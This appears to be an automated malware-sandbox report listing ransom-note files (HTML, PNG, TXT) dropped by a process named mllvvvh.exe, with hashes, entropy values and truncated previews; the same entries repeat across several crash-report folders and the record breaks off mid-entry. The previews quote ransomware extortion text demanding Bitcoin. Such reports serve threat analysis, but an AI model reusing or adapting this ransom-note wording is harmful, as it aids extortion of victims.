                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c648c7\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c648c7\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64be4\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64be4\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64be4\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c651b0\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c651b0\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c651b0\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65588\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65588\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65588\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65b55\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65b55\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65b55\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65f5c\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65f5c\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c65f5c\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6835f\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6835f\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6835f\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
